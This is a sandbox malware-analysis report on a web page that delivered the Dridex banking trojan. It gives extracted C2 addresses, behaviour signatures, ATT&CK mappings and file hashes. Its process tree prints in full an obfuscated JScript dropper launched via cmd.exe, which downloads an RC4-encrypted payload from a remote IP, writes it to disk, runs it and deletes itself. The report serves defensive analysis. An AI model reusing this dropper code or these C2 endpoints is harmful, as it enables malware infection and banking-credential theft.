Overview

overview

10

Static

static

URLScan

urlscan

https://nawa-store.c...

windows7_x64

1

https://nawa-store.c...

windows10_x64

10

Analysis

  • max time kernel
    87s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10-jp
  • submitted
    08-09-2021 23:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://nawa-store.com/shopinside

  • Sample

    210908-3r4jnsadgn

Score
10/10
dridex10111botnetdiscoveryevasionpersistencetrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

104.152.111.198:9676

92.247.29.75:10172

133.242.136.130:8194
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Modifies system executable filetype association 2 TTPs 3 IoCs
    persistence
  • Registers COM server for autorun 1 TTPs
    persistence
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 8 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 42 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 23 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://nawa-store.com/shopinside
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4984
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4984 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3328
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.59/?NDA0MDcw&INyTNcT&cxssdvxcv=83epinny.75gy98.406i4f0g3&ogfgafgn4=wnzQMvXcLBXQFYPDJf7cT&fhfghddfsdf=shuffle&sdfsdfdfg=from&dsfdffg43t=6dDKUfYH1iJz5Ga3fqSCZz9JHT10NzUSkrx6B2aCl_h9qZ8L-YFaQbi203WKgYymIxYUQwRpKmsixDTzheZ0ZaF_BTfNVhErqKTHLMLhR32zIE&uStMjEwMDg=" "2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4672
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.59/?NDA0MDcw&INyTNcT&cxssdvxcv=83epinny.75gy98.406i4f0g3&ogfgafgn4=wnzQMvXcLBXQFYPDJf7cT&fhfghddfsdf=shuffle&sdfsdfdfg=from&dsfdffg43t=6dDKUfYH1iJz5Ga3fqSCZz9JHT10NzUSkrx6B2aCl_h9qZ8L-YFaQbi203WKgYymIxYUQwRpKmsixDTzheZ0ZaF_BTfNVhErqKTHLMLhR32zIE&uStMjEwMDg=" "2"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:4556
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c tjrt6.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1220
            • C:\Users\Admin\AppData\Local\Temp\tjrt6.exe
              tjrt6.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:2640
  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1568
    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
      C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
      2⤵
      • Modifies system executable filetype association
      • Adds Run key to start application
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2652
      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe
        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies registry class
        PID:5116
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2456
  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
    1⤵
      PID:3200
    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe
      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe" /frequentupdate SCHEDULEDTASK displaylevel=False
      1⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of SetWindowsHookEx
      PID:4728

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Change Default File Association

    1
    T1042

    Registry Run Keys / Startup Folder

    2
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    3
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63
      MD5

      0b7f9b062a5ecad1f1ca72211d599a46

      SHA1

      0b9f8a13cd7014e30e0c56a17ddbf91eecdc1c43

      SHA256

      b742d9d06346ba592678d44615d38df85749dca5546c4766177b8ff77702d194

      SHA512

      0d4a28aff91439ea0b475369c3dcc18f32a488aed4dec5910ba5a88f840074ff862e302cda2141388c0c8ca0f4e843f8864cd9b8b556ffb4076d5ae783f87073

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      MD5

      3975a0e57e1653c7dc168646f77c2e14

      SHA1

      c3fd2d2225935d71bf33f0e1aacf98e378f6f4c4

      SHA256

      8e1a17c15468b5a7c0935f7c3fb57cfbd73110c8d13fdd39e452cba39919a6cd

      SHA512

      4ebd4527f78bf8520944bd5982de362eb23fc5666c4cf5a9a4457d191e63db17492883c0afd87d7b3556c8893cd9abd4c1add21864d622a3fa672ebc1e39503b

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63
      MD5

      ab8de844f70c001ea7ff843dcd3824c6

      SHA1

      31da843846bde9c6a3c2f867e40d829007fb5abf

      SHA256

      b3b51388c26c91e35e062d92e76dfdd7b930249d81df7825c959db473ad007fd

      SHA512

      804ad3612b870d19c46dc4d38047557367fad5446bb8654ec84ae9792f3f42865e955fd964e87f42fd0e8477657ee16f758caecdd68309bace68b6ed4ab5db92

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      MD5

      9404ef80828414e3ea58ea0d0d5f6848

      SHA1

      46cf1d396be30a609d828969bf9f1d8e89352fdc

      SHA256

      cf76d14c64ed432d44edd3d752063233c474e645125fa1c237125b440a479e6f

      SHA512

      4bf7610a702d60020932938a50be241896770cd933fa508e62741bf847ba62cc3336ff9c664e28764af3d1749757c7a4953565e9bc1adeda6495966a2a4009ae

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe
      MD5

      c6d71be1016cf51f7b2d04e2eefbb6e7

      SHA1

      b31d9318e78ec4355412dd1cb70c1bddec004458

      SHA256

      df635c8722e0eb4b85af00b4ee365f005adc11bf999e604141d5f0c36bcf739b

      SHA512

      9d8000b5b4241192cf4d86c66d4186ccb2a49f5e25efd793268b8fb5c2065c4c1c42a6fbf98594563ab09948cbed4abf28ee0de67b9443285c0bde539880593d

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\LoggingPlatform.DLL
      MD5

      7939f580b99f4ab153fc4ea6791e12c5

      SHA1

      3e1446c7f09f7131df177eb81e74787de2278e46

      SHA256

      43d64945b036f774f93ae6cce67bb82fe8062147d98821d173d4861e2f83e18c

      SHA512

      090e57bc7cf321d52b40bc4748e2f4ea1170dae3df96645e003ce2900efbcb840931d572cba163f20b51b83fbd722e95b7ae747ec6dc9c6aa1b55a3cbbd5a215

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\MSVCP140.dll
      MD5

      d4c601e8c1c38954c29855b7016183ac

      SHA1

      dec6d8546d7487c9af671e287415b54e8fff0940

      SHA256

      d59c4953fca6a2bc1957273a18fc94d8b28fd083b84021b7268dff6fc3781fcf

      SHA512

      febd0bd6e412d7276812ed895d51c54b39cca3d646c076e5786cdf935c0ced3d20244a5411013474276d3abc43bc79e1e9e6f8c144651d8f7f75af8f4784c12b

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\Telemetry.dll
      MD5

      b4770ab4d34d3c1653d57c44683dfda5

      SHA1

      b5e33187125891427d36cc7c6319d7584793330c

      SHA256

      1e08e3b3f13a3b70d959879fae71091302fbefb1d15ecd5c44e5a858809eafec

      SHA512

      9e5c6a5d4cc6d706e5c2858e5500ed4c1a5f2472c76b03f4845b6951cbe1512aae7431daa225c134d66c77374d74d71f48d6c417f465abfefbe1e364f4b24c16

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\UpdateRingSettings.dll
      MD5

      6eedf5b0ec34ab63ccfba8f9cb3d79bb

      SHA1

      c1b72dcfd33627182b8dea84eb03b21fd78ffb82

      SHA256

      a4f1318343ebfacb0bcc91ef9f5431effb529e276eee29efdff549374dff229a

      SHA512

      ade0a3096324d4de1accf14af584e97247495bc467a92dfc48ef9eeae9a0dbebe63089a97c6f6c4f023451a5bd042eb3fd90ed19673f847aa082b71ba4be318e

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\VCRUNTIME140.dll
      MD5

      da4f88df70cfc535782c334bb145bb5e

      SHA1

      95fad296dcf470799fa5f1bf7bf401760da757d1

      SHA256

      bf86ad2fdd2c39ac64776643d74a9257df13b5fb1e1c89ccb793847ba927e6d2

      SHA512

      a626c0c247a0b993487292ca17349ed9a5b32f6d2ecd1f24140c0f86592a81ba32ba6e929ba2a0bd24ea7285e058e1da03df34448140e7ada88824bccfbe5764

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\SAQ3YIXZ.cookie
      MD5

      7d26eb1ded4001ae85a6b4ef9894371d

      SHA1

      29431a1d623b6b5f41174c3b0004141a72e5de75

      SHA256

      b655431de97d354d72622ee9c355a42fb954655bd5cd5085c970ca6f9730013c

      SHA512

      c575e2559920490d354610adac9a0237a4205646d66927e3f1a4c46416030596161dc0c01cc2165d158373e675e203069a497b5381bbf86c157fa4a8114f8f54

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\XN1M3O77.cookie
      MD5

      7cc1ddd8266cb3584a4f7074b3637f82

      SHA1

      28586a9f876ede28543bfe6826f81af681cd8535

      SHA256

      e572cc9ce20e07cc482aff36dab367c2ed278787b9954a65aeaa5c13e9f42e87

      SHA512

      d7791e2187da7c6bf45be0626de4c03b37cb08f00cd571853b45cd2052035f24713d8f0d6eeedb6c1f851bfe38e74bc9432a317a48bbb357dd673bd455f166a4

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\3.tMp
      MD5

      60fc00422b399db85f87d41b8328976d

      SHA1

      bb85034acad8025f97e5bb236443debaf8926e4b

      SHA256

      c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

      SHA512

      16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tjrt6.exe
      MD5

      a854c2c747ddd3470b085ff964f8c820

      SHA1

      510e83b2cba2eb1f2847af70336d55b5c2987604

      SHA256

      29c9c16184adbd4a89adae57a8ee795c2ef19c4a2c9a91072573f653f3084d08

      SHA512

      e69035824adb7344292880e1943c287743888ada13c46c8de337224bf25d308e853db81f625030f7c0f4b92a40a392e49562c402e5dcf5f2718c653df0d6d434

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tjrt6.exe
      MD5

      a854c2c747ddd3470b085ff964f8c820

      SHA1

      510e83b2cba2eb1f2847af70336d55b5c2987604

      SHA256

      29c9c16184adbd4a89adae57a8ee795c2ef19c4a2c9a91072573f653f3084d08

      SHA512

      e69035824adb7344292880e1943c287743888ada13c46c8de337224bf25d308e853db81f625030f7c0f4b92a40a392e49562c402e5dcf5f2718c653df0d6d434

      Download Submit
    • \Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\LoggingPlatform.dll
      MD5

      7939f580b99f4ab153fc4ea6791e12c5

      SHA1

      3e1446c7f09f7131df177eb81e74787de2278e46

      SHA256

      43d64945b036f774f93ae6cce67bb82fe8062147d98821d173d4861e2f83e18c

      SHA512

      090e57bc7cf321d52b40bc4748e2f4ea1170dae3df96645e003ce2900efbcb840931d572cba163f20b51b83fbd722e95b7ae747ec6dc9c6aa1b55a3cbbd5a215

      Download Submit
    • \Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\Telemetry.dll
      MD5

      b4770ab4d34d3c1653d57c44683dfda5

      SHA1

      b5e33187125891427d36cc7c6319d7584793330c

      SHA256

      1e08e3b3f13a3b70d959879fae71091302fbefb1d15ecd5c44e5a858809eafec

      SHA512

      9e5c6a5d4cc6d706e5c2858e5500ed4c1a5f2472c76b03f4845b6951cbe1512aae7431daa225c134d66c77374d74d71f48d6c417f465abfefbe1e364f4b24c16

      Download Submit
    • \Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\UpdateRingSettings.dll
      MD5

      6eedf5b0ec34ab63ccfba8f9cb3d79bb

      SHA1

      c1b72dcfd33627182b8dea84eb03b21fd78ffb82

      SHA256

      a4f1318343ebfacb0bcc91ef9f5431effb529e276eee29efdff549374dff229a

      SHA512

      ade0a3096324d4de1accf14af584e97247495bc467a92dfc48ef9eeae9a0dbebe63089a97c6f6c4f023451a5bd042eb3fd90ed19673f847aa082b71ba4be318e

      Download Submit
    • \Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\msvcp140.dll
      MD5

      d4c601e8c1c38954c29855b7016183ac

      SHA1

      dec6d8546d7487c9af671e287415b54e8fff0940

      SHA256

      d59c4953fca6a2bc1957273a18fc94d8b28fd083b84021b7268dff6fc3781fcf

      SHA512

      febd0bd6e412d7276812ed895d51c54b39cca3d646c076e5786cdf935c0ced3d20244a5411013474276d3abc43bc79e1e9e6f8c144651d8f7f75af8f4784c12b

      Download Submit
    • \Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\vcruntime140.dll
      MD5

      da4f88df70cfc535782c334bb145bb5e

      SHA1

      95fad296dcf470799fa5f1bf7bf401760da757d1

      SHA256

      bf86ad2fdd2c39ac64776643d74a9257df13b5fb1e1c89ccb793847ba927e6d2

      SHA512

      a626c0c247a0b993487292ca17349ed9a5b32f6d2ecd1f24140c0f86592a81ba32ba6e929ba2a0bd24ea7285e058e1da03df34448140e7ada88824bccfbe5764

      Download Submit
    • \Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\vcruntime140.dll
      MD5

      da4f88df70cfc535782c334bb145bb5e

      SHA1

      95fad296dcf470799fa5f1bf7bf401760da757d1

      SHA256

      bf86ad2fdd2c39ac64776643d74a9257df13b5fb1e1c89ccb793847ba927e6d2

      SHA512

      a626c0c247a0b993487292ca17349ed9a5b32f6d2ecd1f24140c0f86592a81ba32ba6e929ba2a0bd24ea7285e058e1da03df34448140e7ada88824bccfbe5764

      Download Submit
    • \Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\vcruntime140.dll
      MD5

      da4f88df70cfc535782c334bb145bb5e

      SHA1

      95fad296dcf470799fa5f1bf7bf401760da757d1

      SHA256

      bf86ad2fdd2c39ac64776643d74a9257df13b5fb1e1c89ccb793847ba927e6d2

      SHA512

      a626c0c247a0b993487292ca17349ed9a5b32f6d2ecd1f24140c0f86592a81ba32ba6e929ba2a0bd24ea7285e058e1da03df34448140e7ada88824bccfbe5764

      Download Submit
    • \Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\vcruntime140.dll
      MD5

      da4f88df70cfc535782c334bb145bb5e

      SHA1

      95fad296dcf470799fa5f1bf7bf401760da757d1

      SHA256

      bf86ad2fdd2c39ac64776643d74a9257df13b5fb1e1c89ccb793847ba927e6d2

      SHA512

      a626c0c247a0b993487292ca17349ed9a5b32f6d2ecd1f24140c0f86592a81ba32ba6e929ba2a0bd24ea7285e058e1da03df34448140e7ada88824bccfbe5764

      Download Submit
    • memory/1220-120-0x0000000000000000-mapping.dmp
      Download
    • memory/2640-124-0x0000000002120000-0x000000000215C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/2640-125-0x0000000000400000-0x000000000051A000-memory.dmp
      Filesize

      1.1MB

      Download
    • memory/2640-121-0x0000000000000000-mapping.dmp
      Download
    • memory/2652-126-0x0000000000000000-mapping.dmp
      Download
    • memory/3328-116-0x0000000000000000-mapping.dmp
      Download
    • memory/4556-118-0x0000000000000000-mapping.dmp
      Download
    • memory/4672-117-0x0000000000000000-mapping.dmp
      Download
    • memory/4984-115-0x00007FF848C00000-0x00007FF848C6B000-memory.dmp
      Filesize

      428KB

      Download
    • memory/5116-127-0x0000000000000000-mapping.dmp
      Download